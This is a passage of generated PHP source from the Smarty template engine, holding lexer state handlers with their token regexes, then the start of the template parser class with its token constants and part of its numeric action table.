       preg_match($this->yy_global_text, $this->data,$match,PREG_OFFSET_CAPTURE,$this->counter);
       if (isset($match[0][1])) {
         $to = $match[0][1];
       }
       $this->value = substr($this->data,$this->counter,$to-$this->counter);
       $this->token = Smarty_Internal_Templateparser::TP_TEXT;
         }

     
    public function yylex2()
    {
        if (!isset($this->yy_global_pattern2)) {
            $this->yy_global_pattern2 = $this->replace("/\G((SMARTYldel)SMARTYal(if|elseif|else if|while)\\s+)|\G((SMARTYldel)SMARTYalfor\\s+)|\G((SMARTYldel)SMARTYalforeach(?![^\s]))|\G((SMARTYldel)SMARTYalsetfilter\\s+)|\G((SMARTYldel)SMARTYalmake_nocache\\s+)|\G((SMARTYldel)SMARTYal[0-9]*[a-zA-Z_]\\w*(\\s+nocache)?\\s*SMARTYrdel)|\G((SMARTYldel)SMARTYal[$]smarty\\.block\\.(child|parent)\\s*SMARTYrdel)|\G((SMARTYldel)SMARTYal[\/][0-9]*[a-zA-Z_]\\w*\\s*SMARTYrdel)|\G((SMARTYldel)SMARTYal[$][0-9]*[a-zA-Z_]\\w*(\\s+nocache)?\\s*SMARTYrdel)|\G((SMARTYldel)SMARTYal[\/])|\G((SMARTYldel)SMARTYal)/isS");
        }
        if (!isset($this->dataLength)) {
            $this->dataLength = strlen($this->data);
        }
        if ($this->counter >=  $this->dataLength) {
            return false; // end of input
        }
        
        do {
            if (preg_match($this->yy_global_pattern2,$this->data, $yymatches, 0, $this->counter)) {
                if (!isset($yymatches[ 0 ][1])) {
                   $yymatches = preg_grep("/(.|\s)+/", $yymatches);
                } else {
                    $yymatches = array_filter($yymatches);
                }
                if (empty($yymatches)) {
                    throw new Exception('Error: lexing failed because a rule matched' .
                        ' an empty string.  Input "' . substr($this->data,
                        $this->counter, 5) . '... state TAG');
                }
                next($yymatches); // skip global match
                $this->token = key($yymatches); // token number
                $this->value = current($yymatches); // token value
                $r = $this->{'yy_r2_' . $this->token}();
                if ($r === null) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    // accept this token
                    return true;
                } elseif ($r === true) {
                    // we have changed state
                    // process this token in the new state
                    return $this->yylex();
                } elseif ($r === false) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    if ($this->counter >=  $this->dataLength) {
                        return false; // end of input
                    }
                    // skip this token
                    continue;
                }            } else {
                throw new Exception('Unexpected input at line' . $this->line .
                    ': ' . $this->data[$this->counter]);
            }
            break;
        } while (true);

    } // end function


    const TAG = 2;
    public function yy_r2_1()
    {

        $this->token = Smarty_Internal_Templateparser::TP_LDELIF;
        $this->yybegin(self::TAGBODY);
        $this->taglineno = $this->line;
         }
    public function yy_r2_4()
    {

        $this->token = Smarty_Internal_Templateparser::TP_LDELFOR;
        $this->yybegin(self::TAGBODY);
        $this->taglineno = $this->line;
         }
    public function yy_r2_6()
    {

        $this->token = Smarty_Internal_Templateparser::TP_LDELFOREACH;
        $this->yybegin(self::TAGBODY);
        $this->taglineno = $this->line;
         }
    public function yy_r2_8()
    {

        $this->token = Smarty_Internal_Templateparser::TP_LDELSETFILTER;
        $this->yybegin(self::TAGBODY);
        $this->taglineno = $this->line;
         }
    public function yy_r2_10()
    {

        $this->token = Smarty_Internal_Templateparser::TP_LDELMAKENOCACHE;
        $this->yybegin(self::TAGBODY);
        $this->taglineno = $this->line;
         }
    public function yy_r2_12()
    {

        $this->yypopstate();
        $this->token = Smarty_Internal_Templateparser::TP_SIMPLETAG;
        $this->taglineno = $this->line;
         }
    public function yy_r2_15()
    {

         $this->yypopstate();
         $this->token = Smarty_Internal_Templateparser::TP_SMARTYBLOCKCHILDPARENT;
         $this->taglineno = $this->line;
         }
    public function yy_r2_18()
    {

        $this->yypopstate();
        $this->token = Smarty_Internal_Templateparser::TP_CLOSETAG;
        $this->taglineno = $this->line;
         }
    public function yy_r2_20()
    {

        if ($this->_yy_stack[count($this->_yy_stack)-1] === self::TEXT) {
            $this->yypopstate();
            $this->token = Smarty_Internal_Templateparser::TP_SIMPELOUTPUT;
            $this->taglineno = $this->line;
        } else {
            $this->value = $this->smarty->getLeftDelimiter();
            $this->token = Smarty_Internal_Templateparser::TP_LDEL;
            $this->yybegin(self::TAGBODY);
            $this->taglineno = $this->line;
        }
         }
    public function yy_r2_23()
    {

        $this->token = Smarty_Internal_Templateparser::TP_LDELSLASH;
        $this->yybegin(self::TAGBODY);
        $this->taglineno = $this->line;
         }
    public function yy_r2_25()
    {

        $this->token = Smarty_Internal_Templateparser::TP_LDEL;
        $this->yybegin(self::TAGBODY);
        $this->taglineno = $this->line;
         }

     
    public function yylex3()
    {
        if (!isset($this->yy_global_pattern3)) {
            $this->yy_global_pattern3 = $this->replace("/\G(\\s*SMARTYrdel)|\G((SMARTYldel)SMARTYal)|\G([\"])|\G('[^'\\\\]*(?:\\\\.[^'\\\\]*)*')|\G([$][0-9]*[a-zA-Z_]\\w*)|\G([$])|\G(\\s+is\\s+in\\s+)|\G(\\s+as\\s+)|\G(\\s+to\\s+)|\G(\\s+step\\s+)|\G(\\s+instanceof\\s+)|\G(\\s*([!=][=]{1,2}|[<][=>]?|[>][=]?|[&|]{2})\\s*)|\G(\\s+(eq|ne|neq|gt|ge|gte|lt|le|lte|mod|and|or|xor)\\s+)|\G(\\s+is\\s+(not\\s+)?(odd|even|div)\\s+by\\s+)|\G(\\s+is\\s+(not\\s+)?(odd|even))|\G([!]\\s*|not\\s+)|\G([(](int(eger)?|bool(ean)?|float|double|real|string|binary|array|object)[)]\\s*)|\G(\\s*[(]\\s*)|\G(\\s*[)])|\G(\\[\\s*)|\G(\\s*\\])|\G(\\s*[-][>]\\s*)|\G(\\s*[=][>]\\s*)|\G(\\s*[=]\\s*)|\G(([+]|[-]){2})|\G(\\s*([+]|[-])\\s*)|\G(\\s*([*]{1,2}|[%\/^&]|[<>]{2})\\s*)|\G([@])|\G(array\\s*[(]\\s*)|\G([#])|\G(\\s+[0-9]*[a-zA-Z_][a-zA-Z0-9_\-:]*\\s*[=]\\s*)|\G(([0-9]*[a-zA-Z_]\\w*)?(\\\\[0-9]*[a-zA-Z_]\\w*)+)|\G([0-9]*[a-zA-Z_]\\w*)|\G(\\d+)|\G([`])|\G([|][@]?)|\G([.])|\G(\\s*[,]\\s*)|\G(\\s*[;]\\s*)|\G([:]{2})|\G(\\s*[:]\\s*)|\G(\\s*[?]\\s*)|\G(0[xX][0-9a-fA-F]+)|\G(\\s+)|\G([\S\s])/isS");
        }
        if (!isset($this->dataLength)) {
            $this->dataLength = strlen($this->data);
        }
        if ($this->counter >=  $this->dataLength) {
            return false; // end of input
        }
        
        do {
            if (preg_match($this->yy_global_pattern3,$this->data, $yymatches, 0, $this->counter)) {
                if (!isset($yymatches[ 0 ][1])) {
                   $yymatches = preg_grep("/(.|\s)+/", $yymatches);
                } else {
                    $yymatches = array_filter($yymatches);
                }
                if (empty($yymatches)) {
                    throw new Exception('Error: lexing failed because a rule matched' .
                        ' an empty string.  Input "' . substr($this->data,
                        $this->counter, 5) . '... state TAGBODY');
                }
                next($yymatches); // skip global match
                $this->token = key($yymatches); // token number
                $this->value = current($yymatches); // token value
                $r = $this->{'yy_r3_' . $this->token}();
                if ($r === null) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    // accept this token
                    return true;
                } elseif ($r === true) {
                    // we have changed state
                    // process this token in the new state
                    return $this->yylex();
                } elseif ($r === false) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    if ($this->counter >=  $this->dataLength) {
                        return false; // end of input
                    }
                    // skip this token
                    continue;
                }            } else {
                throw new Exception('Unexpected input at line' . $this->line .
                    ': ' . $this->data[$this->counter]);
            }
            break;
        } while (true);

    } // end function


    const TAGBODY = 3;
    public function yy_r3_1()
    {

        $this->token = Smarty_Internal_Templateparser::TP_RDEL;
        $this->yypopstate();
         }
    public function yy_r3_2()
    {

        $this->yypushstate(self::TAG);
        return true;
         }
    public function yy_r3_4()
    {

        $this->token = Smarty_Internal_Templateparser::TP_QUOTE;
        $this->yypushstate(self::DOUBLEQUOTEDSTRING);
        $this->compiler->enterDoubleQuote();
         }
    public function yy_r3_5()
    {

        $this->token = Smarty_Internal_Templateparser::TP_SINGLEQUOTESTRING;
         }
    public function yy_r3_6()
    {

        $this->token = Smarty_Internal_Templateparser::TP_DOLLARID;
         }
    public function yy_r3_7()
    {

        $this->token = Smarty_Internal_Templateparser::TP_DOLLAR;
         }
    public function yy_r3_8()
    {

        $this->token = Smarty_Internal_Templateparser::TP_ISIN;
         }
    public function yy_r3_9()
    {

        $this->token = Smarty_Internal_Templateparser::TP_AS;
         }
    public function yy_r3_10()
    {

        $this->token = Smarty_Internal_Templateparser::TP_TO;
         }
    public function yy_r3_11()
    {

        $this->token = Smarty_Internal_Templateparser::TP_STEP;
         }
    public function yy_r3_12()
    {

        $this->token = Smarty_Internal_Templateparser::TP_INSTANCEOF;
         }
    public function yy_r3_13()
    {

        $this->token = Smarty_Internal_Templateparser::TP_LOGOP;
         }
    public function yy_r3_15()
    {

        $this->token = Smarty_Internal_Templateparser::TP_SLOGOP;
         }
    public function yy_r3_17()
    {

        $this->token = Smarty_Internal_Templateparser::TP_TLOGOP;
         }
    public function yy_r3_20()
    {

        $this->token = Smarty_Internal_Templateparser::TP_SINGLECOND;
         }
    public function yy_r3_23()
    {

        $this->token = Smarty_Internal_Templateparser::TP_NOT;
         }
    public function yy_r3_24()
    {

        $this->token = Smarty_Internal_Templateparser::TP_TYPECAST;
         }
    public function yy_r3_28()
    {

        $this->token = Smarty_Internal_Templateparser::TP_OPENP;
         }
    public function yy_r3_29()
    {

        $this->token = Smarty_Internal_Templateparser::TP_CLOSEP;
         }
    public function yy_r3_30()
    {

        $this->token = Smarty_Internal_Templateparser::TP_OPENB;
         }
    public function yy_r3_31()
    {

        $this->token = Smarty_Internal_Templateparser::TP_CLOSEB;
         }
    public function yy_r3_32()
    {

        $this->token = Smarty_Internal_Templateparser::TP_PTR;
         }
    public function yy_r3_33()
    {

        $this->token = Smarty_Internal_Templateparser::TP_APTR;
         }
    public function yy_r3_34()
    {

        $this->token = Smarty_Internal_Templateparser::TP_EQUAL;
         }
    public function yy_r3_35()
    {

        $this->token = Smarty_Internal_Templateparser::TP_INCDEC;
         }
    public function yy_r3_37()
    {

        $this->token = Smarty_Internal_Templateparser::TP_UNIMATH;
         }
    public function yy_r3_39()
    {

        $this->token = Smarty_Internal_Templateparser::TP_MATH;
         }
    public function yy_r3_41()
    {

        $this->token = Smarty_Internal_Templateparser::TP_AT;
         }
    public function yy_r3_42()
    {

        $this->token = Smarty_Internal_Templateparser::TP_ARRAYOPEN;
         }
    public function yy_r3_43()
    {

        $this->token = Smarty_Internal_Templateparser::TP_HATCH;
         }
    public function yy_r3_44()
    {

        // resolve conflicts with shorttag and right_delimiter starting with '='
        if (substr($this->data, $this->counter + strlen($this->value) - 1, $this->compiler->getRdelLength()) === $this->smarty->getRightDelimiter()) {
            preg_match('/\s+/',$this->value,$match);
            $this->value = $match[0];
            $this->token = Smarty_Internal_Templateparser::TP_SPACE;
        } else {
            $this->token = Smarty_Internal_Templateparser::TP_ATTR;
        }
         }
    public function yy_r3_45()
    {

        $this->token = Smarty_Internal_Templateparser::TP_NAMESPACE;
         }
    public function yy_r3_48()
    {

        $this->token = Smarty_Internal_Templateparser::TP_ID;
         }
    public function yy_r3_49()
    {

        $this->token = Smarty_Internal_Templateparser::TP_INTEGER;
         }
    public function yy_r3_50()
    {

        $this->token = Smarty_Internal_Templateparser::TP_BACKTICK;
        $this->yypopstate();
         }
    public function yy_r3_51()
    {

        $this->token = Smarty_Internal_Templateparser::TP_VERT;
         }
    public function yy_r3_52()
    {

        $this->token = Smarty_Internal_Templateparser::TP_DOT;
         }
    public function yy_r3_53()
    {

        $this->token = Smarty_Internal_Templateparser::TP_COMMA;
         }
    public function yy_r3_54()
    {

        $this->token = Smarty_Internal_Templateparser::TP_SEMICOLON;
         }
    public function yy_r3_55()
    {

        $this->token = Smarty_Internal_Templateparser::TP_DOUBLECOLON;
         }
    public function yy_r3_56()
    {

        $this->token = Smarty_Internal_Templateparser::TP_COLON;
         }
    public function yy_r3_57()
    {

        $this->token = Smarty_Internal_Templateparser::TP_QMARK;
         }
    public function yy_r3_58()
    {

        $this->token = Smarty_Internal_Templateparser::TP_HEX;
         }
    public function yy_r3_59()
    {

        $this->token = Smarty_Internal_Templateparser::TP_SPACE;
         }
    public function yy_r3_60()
    {

        $this->token = Smarty_Internal_Templateparser::TP_TEXT;
         }


     
    public function yylex4()
    {
        if (!isset($this->yy_global_pattern4)) {
            $this->yy_global_pattern4 = $this->replace("/\G((SMARTYldel)SMARTYalliteral\\s*SMARTYrdel)|\G((SMARTYldel)SMARTYal[\/]literal\\s*SMARTYrdel)|\G([\S\s])/isS");
        }
        if (!isset($this->dataLength)) {
            $this->dataLength = strlen($this->data);
        }
        if ($this->counter >=  $this->dataLength) {
            return false; // end of input
        }
        
        do {
            if (preg_match($this->yy_global_pattern4,$this->data, $yymatches, 0, $this->counter)) {
                if (!isset($yymatches[ 0 ][1])) {
                   $yymatches = preg_grep("/(.|\s)+/", $yymatches);
                } else {
                    $yymatches = array_filter($yymatches);
                }
                if (empty($yymatches)) {
                    throw new Exception('Error: lexing failed because a rule matched' .
                        ' an empty string.  Input "' . substr($this->data,
                        $this->counter, 5) . '... state LITERAL');
                }
                next($yymatches); // skip global match
                $this->token = key($yymatches); // token number
                $this->value = current($yymatches); // token value
                $r = $this->{'yy_r4_' . $this->token}();
                if ($r === null) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    // accept this token
                    return true;
                } elseif ($r === true) {
                    // we have changed state
                    // process this token in the new state
                    return $this->yylex();
                } elseif ($r === false) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    if ($this->counter >=  $this->dataLength) {
                        return false; // end of input
                    }
                    // skip this token
                    continue;
                }            } else {
                throw new Exception('Unexpected input at line' . $this->line .
                    ': ' . $this->data[$this->counter]);
            }
            break;
        } while (true);

    } // end function


    const LITERAL = 4;
    public function yy_r4_1()
    {

        $this->literal_cnt++;
        $this->token = Smarty_Internal_Templateparser::TP_LITERAL;
         }
    public function yy_r4_3()
    {

        if ($this->literal_cnt) {
             $this->literal_cnt--;
            $this->token = Smarty_Internal_Templateparser::TP_LITERAL;
        } else {
            $this->token = Smarty_Internal_Templateparser::TP_LITERALEND;
            $this->yypopstate();
        }
         }
    public function yy_r4_5()
    {

       if (!isset($this->yy_global_literal)) {
           $this->yy_global_literal = $this->replace('/(SMARTYldel)SMARTYal[\/]?literalSMARTYrdel/isS');
       }
       $to = $this->dataLength;
       preg_match($this->yy_global_literal, $this->data,$match,PREG_OFFSET_CAPTURE,$this->counter);
       if (isset($match[0][1])) {
         $to = $match[0][1];
       } else {
          $this->compiler->trigger_template_error ("missing or misspelled literal closing tag");
       }
       $this->value = substr($this->data,$this->counter,$to-$this->counter);
       $this->token = Smarty_Internal_Templateparser::TP_LITERAL;
         }

     
    public function yylex5()
    {
        if (!isset($this->yy_global_pattern5)) {
            $this->yy_global_pattern5 = $this->replace("/\G((SMARTYldel)SMARTYautoliteral\\s+SMARTYliteral)|\G((SMARTYldel)SMARTYalliteral\\s*SMARTYrdel)|\G((SMARTYldel)SMARTYal[\/]literal\\s*SMARTYrdel)|\G((SMARTYldel)SMARTYal[\/])|\G((SMARTYldel)SMARTYal[0-9]*[a-zA-Z_]\\w*)|\G((SMARTYldel)SMARTYal)|\G([\"])|\G([`][$])|\G([$][0-9]*[a-zA-Z_]\\w*)|\G([$])|\G(([^\"\\\\]*?)((?:\\\\.[^\"\\\\]*?)*?)(?=((SMARTYldel)SMARTYal|\\$|`\\$|\"SMARTYliteral)))|\G([\S\s])/isS");
        }
        if (!isset($this->dataLength)) {
            $this->dataLength = strlen($this->data);
        }
        if ($this->counter >=  $this->dataLength) {
            return false; // end of input
        }
        
        do {
            if (preg_match($this->yy_global_pattern5,$this->data, $yymatches, 0, $this->counter)) {
                if (!isset($yymatches[ 0 ][1])) {
                   $yymatches = preg_grep("/(.|\s)+/", $yymatches);
                } else {
                    $yymatches = array_filter($yymatches);
                }
                if (empty($yymatches)) {
                    throw new Exception('Error: lexing failed because a rule matched' .
                        ' an empty string.  Input "' . substr($this->data,
                        $this->counter, 5) . '... state DOUBLEQUOTEDSTRING');
                }
                next($yymatches); // skip global match
                $this->token = key($yymatches); // token number
                $this->value = current($yymatches); // token value
                $r = $this->{'yy_r5_' . $this->token}();
                if ($r === null) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    // accept this token
                    return true;
                } elseif ($r === true) {
                    // we have changed state
                    // process this token in the new state
                    return $this->yylex();
                } elseif ($r === false) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    if ($this->counter >=  $this->dataLength) {
                        return false; // end of input
                    }
                    // skip this token
                    continue;
                }            } else {
                throw new Exception('Unexpected input at line' . $this->line .
                    ': ' . $this->data[$this->counter]);
            }
            break;
        } while (true);

    } // end function


    const DOUBLEQUOTEDSTRING = 5;
    public function yy_r5_1()
    {

        $this->token = Smarty_Internal_Templateparser::TP_TEXT;
         }
    public function yy_r5_3()
    {

        $this->token = Smarty_Internal_Templateparser::TP_TEXT;
         }
    public function yy_r5_5()
    {

        $this->token = Smarty_Internal_Templateparser::TP_TEXT;
         }
    public function yy_r5_7()
    {

        $this->yypushstate(self::TAG);
        return true;
         }
    public function yy_r5_9()
    {

        $this->yypushstate(self::TAG);
        return true;
         }
    public function yy_r5_11()
    {

        $this->token = Smarty_Internal_Templateparser::TP_LDEL;
        $this->taglineno = $this->line;
        $this->yypushstate(self::TAGBODY);
         }
    public function yy_r5_13()
    {

        $this->token = Smarty_Internal_Templateparser::TP_QUOTE;
        $this->yypopstate();
         }
    public function yy_r5_14()
    {

        $this->token = Smarty_Internal_Templateparser::TP_BACKTICK;
        $this->value = substr($this->value,0,-1);
        $this->yypushstate(self::TAGBODY);
        $this->taglineno = $this->line;
         }
    public function yy_r5_15()
    {

        $this->token = Smarty_Internal_Templateparser::TP_DOLLARID;
         }
    public function yy_r5_16()
    {

        $this->token = Smarty_Internal_Templateparser::TP_TEXT;
         }
    public function yy_r5_17()
    {

        $this->token = Smarty_Internal_Templateparser::TP_TEXT;
         }
    public function yy_r5_22()
    {

        $to = $this->dataLength;
        $this->value = substr($this->data,$this->counter,$to-$this->counter);
        $this->token = Smarty_Internal_Templateparser::TP_TEXT;
         }

  }

     <?php

class TP_yyStackEntry
{
    public $stateno;       /* The state-number */
    public $major;         /* The major token value.  This is the code
                     ** number for the token at this stack level */
    public $minor; /* The user-supplied minor token value.  This
                     ** is the value of the token  */
};


// line 11 "../smarty/lexer/smarty_internal_templateparser.y"

/**
* Smarty Template Parser Class
*
* This is the template parser.
* It is generated from the smarty_internal_templateparser.y file
* 
* @author Uwe Tews <uwe.tews@googlemail.com>
*/
class Smarty_Internal_Templateparser
{
// line 23 "../smarty/lexer/smarty_internal_templateparser.y"

    const ERR1 = 'Security error: Call to private object member not allowed';
    const ERR2 = 'Security error: Call to dynamic object member not allowed';

    /**
     * result status
     *
     * @var bool
     */
    public $successful = true;

    /**
     * return value
     *
     * @var mixed
     */
    public $retvalue = 0;

    /**
     * @var
     */
    public $yymajor;

    /**
     * last index of array variable
     *
     * @var mixed
     */
    public $last_index;

    /**
     * last variable name
     *
     * @var string
     */
    public $last_variable;

    /**
     * root parse tree buffer
     *
     * @var Smarty_Internal_ParseTree_Template
     */
    public $root_buffer;

    /**
     * current parse tree object
     *
     * @var Smarty_Internal_ParseTree
     */
    public $current_buffer;

    /**
     * lexer object
     *
     * @var Smarty_Internal_Templatelexer
     */
    public $lex;

    /**
     * internal error flag
     *
     * @var bool
     */
    private $internalError = false;

    /**
     * {strip} status
     *
     * @var bool
     */
    public $strip = false;
    /**
     * compiler object
     *
     * @var Smarty_Internal_TemplateCompilerBase
     */
    public $compiler = null;

    /**
     * smarty object
     *
     * @var Smarty
     */
    public $smarty = null;

    /**
     * template object
     *
     * @var Smarty_Internal_Template
     */
    public $template = null;

    /**
     * block nesting level
     *
     * @var int
     */
    public $block_nesting_level = 0;

    /**
     * security object
     *
     * @var Smarty_Security
     */
    public $security = null;

    /**
     * template prefix array
     *
     * @var \Smarty_Internal_ParseTree[]
     */
    public $template_prefix = array();

    /**
     * template prefix array
     *
     * @var \Smarty_Internal_ParseTree[]
     */
    public $template_postfix = array();

    /**
     * constructor
     *
     * @param Smarty_Internal_Templatelexer        $lex
     * @param Smarty_Internal_TemplateCompilerBase $compiler
     */
    public function __construct(Smarty_Internal_Templatelexer $lex, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $this->lex = $lex;
        $this->compiler = $compiler;
        $this->template = $this->compiler->template;
        $this->smarty = $this->template->smarty;
        $this->security = isset($this->smarty->security_policy) ? $this->smarty->security_policy : false;
        $this->current_buffer = $this->root_buffer = new Smarty_Internal_ParseTree_Template();
    }

     /**
     * insert PHP code in current buffer
     *
     * @param string $code
     */
    public function insertPhpCode($code)
    {
        $this->current_buffer->append_subtree($this, new Smarty_Internal_ParseTree_Tag($this, $code));
    }

    /**
     * error rundown
     *
     */
    public function errorRunDown()
    {
        while ($this->yystack !== array()) {
            $this->yy_pop_parser_stack();
        }
        if (is_resource($this->yyTraceFILE)) {
            fclose($this->yyTraceFILE);
        }
    }

    /**
     *  merge PHP code with prefix code and return parse tree tag object
     *
     * @param string $code
     *
     * @return Smarty_Internal_ParseTree_Tag
     */
    public function mergePrefixCode($code)
    {
        $tmp = '';
        foreach ($this->compiler->prefix_code as $preCode) {
            $tmp .= $preCode;
        }
        $this->compiler->prefix_code = array();
        $tmp .= $code;
        return new Smarty_Internal_ParseTree_Tag($this, $this->compiler->processNocacheCode($tmp, true));
    }


    const TP_VERT                           =  1;
    const TP_COLON                          =  2;
    const TP_TEXT                           =  3;
    const TP_STRIPON                        =  4;
    const TP_STRIPOFF                       =  5;
    const TP_LITERALSTART                   =  6;
    const TP_LITERALEND                     =  7;
    const TP_LITERAL                        =  8;
    const TP_SIMPELOUTPUT                   =  9;
    const TP_SIMPLETAG                      = 10;
    const TP_SMARTYBLOCKCHILDPARENT         = 11;
    const TP_LDEL                           = 12;
    const TP_RDEL                           = 13;
    const TP_DOLLARID                       = 14;
    const TP_EQUAL                          = 15;
    const TP_ID                             = 16;
    const TP_PTR                            = 17;
    const TP_LDELMAKENOCACHE                = 18;
    const TP_LDELIF                         = 19;
    const TP_LDELFOR                        = 20;
    const TP_SEMICOLON                      = 21;
    const TP_INCDEC                         = 22;
    const TP_TO                             = 23;
    const TP_STEP                           = 24;
    const TP_LDELFOREACH                    = 25;
    const TP_SPACE                          = 26;
    const TP_AS                             = 27;
    const TP_APTR                           = 28;
    const TP_LDELSETFILTER                  = 29;
    const TP_CLOSETAG                       = 30;
    const TP_LDELSLASH                      = 31;
    const TP_ATTR                           = 32;
    const TP_INTEGER                        = 33;
    const TP_COMMA                          = 34;
    const TP_OPENP                          = 35;
    const TP_CLOSEP                         = 36;
    const TP_MATH                           = 37;
    const TP_UNIMATH                        = 38;
    const TP_ISIN                           = 39;
    const TP_QMARK                          = 40;
    const TP_NOT                            = 41;
    const TP_TYPECAST                       = 42;
    const TP_HEX                            = 43;
    const TP_DOT                            = 44;
    const TP_INSTANCEOF                     = 45;
    const TP_SINGLEQUOTESTRING              = 46;
    const TP_DOUBLECOLON                    = 47;
    const TP_NAMESPACE                      = 48;
    const TP_AT                             = 49;
    const TP_HATCH                          = 50;
    const TP_OPENB                          = 51;
    const TP_CLOSEB                         = 52;
    const TP_DOLLAR                         = 53;
    const TP_LOGOP                          = 54;
    const TP_SLOGOP                         = 55;
    const TP_TLOGOP                         = 56;
    const TP_SINGLECOND                     = 57;
    const TP_ARRAYOPEN                      = 58;
    const TP_QUOTE                          = 59;
    const TP_BACKTICK                       = 60;
    const YY_NO_ACTION = 514;
    const YY_ACCEPT_ACTION = 513;
    const YY_ERROR_ACTION = 512;

    const YY_SZ_ACTTAB = 1997;
public static $yy_action = array(
    249,  250,  239,    1,   27,  127,  220,  184,  160,  213,
     11,   54,  278,   10,  173,   34,  108,  387,  282,  279,
    223,  321,  221,    8,  194,  387,   18,  387,   85,   41,
    387,  285,   42,   44,  264,  222,  387,  209,  387,  198,
    387,   52,    5,  307,  288,  288,  164,  283,  224,    4,
     50,  249,  250,  239,    1,  232,  131,  381,  189,  205,
    213,   11,   54,   39,   35,  243,   31,  108,   94,   17,
    381,  223,  321,  221,  439,  226,  381,   33,   49,  426,
     41,  439,   89,   42,   44,  264,  222,    9,  235,  163,
    198,  426,   52,    5,  131,  288,  212,  284,  102,  106,
      4,   50,  249,  250,  239,    1,  232,  129,  426,  189,
    347,  213,   11,   54,  175,  324,  347,  208,  108,   22,
    426,  301,  223,  321,  221,  302,  226,  135,   18,   49,
     52,   41,   26,  288,   42,   44,  264,  222,   16,  235,
    294,  198,  204,   52,    5,  170,  288,   32,   90,  267,
    268,    4,   50,  249,  250,  239,    1,   20,  129,  185,
    179,  255,  213,   11,   54,  455,  288,  192,  455,  108,
    175,  167,  455,  223,  321,  221,  439,  226,  256,   18,
     55,  292,   41,  439,  132,   42,   44,  264,  222,  427,
    235,   12,  198,  165,   52,    5,  232,  288,  288,  347,
    153,  427,    4,   50,  249,  250,  239,    1,  232,  129,
    286,  181,  347,  213,   11,   54,   24,   13,  347,   49,
    108,  232,  320,  426,  223,  321,  221,  195,  201,  173,
     18,   49,  139,   41,  296,  426,   42,   44,  264,  222,
      7,  235,  286,  198,   49,   52,    5,  147,  288,  117,
    150,  317,  263,    4,   50,  249,  250,  239,    1,   95,
    130,  173,  189,  155,  213,   11,   54,   22,  244,  271,
    192,  108,  323,  286,  101,  223,  321,  221,  294,  226,
    204,   18,  348,  257,   41,  166,  283,   42,   44,  264,
    222,   28,  235,  300,  198,  348,   52,    5,  247,  288,
    117,  348,   94,  206,    4,   50,  249,  250,  239,    1,
     95,  129,   22,  189,  277,  213,   11,   54,   91,  274,
    224,  426,  108,  323,  216,  156,  223,  321,  221,  132,
    180,  262,   18,  426,  100,   41,   12,  288,   42,   44,
    264,  222,   15,  235,  216,  198,  254,   52,    5,  233,
    288,  210,  190,  192,  100,    4,   50,  249,  250,  239,
      1,    3,  131,   94,  189,  192,  213,   11,   54,  269,
     10,  204,  290,  108,  325,  216,  224,  223,  321,  221,
     23,  226,  211,   33,  315,  100,   45,  513,   92,   42,
     44,  264,  222,  102,  235,  178,  198,  268,   52,    5,
    275,  288,  161,  192,   37,   25,    4,   50,  249,  250,
    239,    1,  286,  129,  172,  187,  305,  213,   11,   54,
    164,  283,  310,  141,  108,  281,  281,  236,  223,  321,
    221,  169,  226,  230,   18,  122,  171,   41,  225,  175,
     42,   44,  264,  222,  144,  235,  303,  198,  134,   52,
      5,  265,  288,  151,  286,  192,  175,    4,   50,  249,
    250,  239,    1,  286,  128,   94,  189,  143,  213,   11,
     54,  219,  152,  207,  193,  108,  149,  281,   31,  223,
    321,  221,  100,  226,   21,    6,  286,  288,   41,  158,
     16,   42,   44,  264,  222,  102,  235,  238,  198,  286,
     52,    5,  157,  288,  281,  122,  168,  283,    4,   50,
    249,  250,  239,    1,   30,   93,  308,   51,  215,  213,
     11,   54,   53,  251,  140,  248,  108,  245,  304,  116,
    223,  321,  221,  111,  226,  176,   18,  270,  266,   41,
    224,  322,   42,   44,  264,  222,    7,  235,  259,  198,
    147,   52,    5,  257,  288,   43,   40,   38,   83,    4,
     50,  241,  214,  204,  319,  280,   88,  107,  138,  182,
     97,   64,  311,  312,  313,  316,   95,  281,  298,  258,
    142,  234,   94,  105,  272,  197,  231,  482,  237,  323,
     37,  133,  324,  241,  214,  204,  319,  314,   88,  107,
    296,  183,   97,   82,   84,   43,   40,   38,   95,  296,
    296,  258,  296,  296,  296,  159,  272,  197,  231,  296,
    237,  323,  311,  312,  313,  316,  241,  296,  204,  296,
    296,  103,  296,  296,  199,  104,   77,  296,  296,  110,
    296,   95,  296,  296,  258,  278,  296,  296,   34,  272,
    197,  231,  279,  237,  323,   43,   40,   38,  296,  296,
    296,  241,   26,  204,  196,  276,  103,  296,   16,  199,
    104,   77,  311,  312,  313,  316,   95,  192,  296,  258,
    146,  296,  296,  296,  272,  197,  231,  296,  237,  323,
    286,  393,   39,   35,  243,  296,  296,  296,  296,  191,
    276,  296,   26,  318,  252,  253,  126,  296,   16,  249,
    250,  239,    1,  296,  296,  131,  296,  261,  213,   11,
     54,  296,  296,  296,  426,  108,  393,  393,  393,  223,
    321,  221,  241,  296,  204,  299,  426,  103,  107,  296,
    183,   97,   82,  393,  393,  393,  393,   95,  296,  260,
    258,   52,  296,  296,  288,  272,  197,  231,  296,  237,
    323,  293,  296,  296,  296,  296,  296,  249,  250,  239,
      2,  296,  295,  296,  296,  296,  213,   11,   54,  296,
    296,  177,  296,  108,  136,  296,  296,  223,  321,  221,
    296,  296,  296,  293,   43,   40,   38,  296,  296,  249,
    250,  239,    2,  296,  295,   43,   40,   38,  213,   11,
     54,  311,  312,  313,  316,  108,  296,  291,   14,  223,
    321,  221,  311,  312,  313,  316,  296,  296,  241,  296,
    204,  296,  192,  103,  296,  296,  199,  104,   77,  296,
    296,  296,  296,   95,  383,  296,  258,  296,  296,  297,
     14,  272,  197,  231,  296,  237,  323,  383,  296,  296,
    241,  296,  204,  383,  296,   99,  296,  287,  199,  120,
     48,  241,  112,  204,  296,   95,  103,  296,  258,  199,
    120,   74,  296,  272,  197,  231,   95,  237,  323,  258,
    455,  296,  296,  455,  272,  197,  231,  455,  237,  323,
